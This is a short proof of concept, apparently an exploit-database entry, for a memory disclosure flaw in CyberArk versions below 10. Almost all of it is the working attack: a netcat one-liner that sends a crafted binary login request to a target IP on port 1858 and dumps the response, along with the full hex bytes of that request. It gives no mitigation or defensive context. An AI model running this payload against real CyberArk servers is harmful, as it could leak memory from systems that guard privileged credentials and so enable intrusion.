CyberArk < 10 - Memory Disclosure
Cyber Ark port 1858 is a proprietary software and protocol to perform login and administrative services. The below is a sample login request that is needed to receive the memory. Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd paste the following bytes into a hexedited file named logon.bin: fffffffff7000000ffffffff3d0100005061636c695363726970745573657200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020202020ffffffff0000000000000000000073000000cececece00000000000000000000000000000000303d4c6f676f6efd3131353d372e32302e39302e3238fd36393d50fd3131363d30fd3130303dfd3231373d59fd3231383d5041434c49fd3231393dfd3331373d30fd3335373d30fd32323d5061636c6953637269707455736572fd3336373d3330fd0000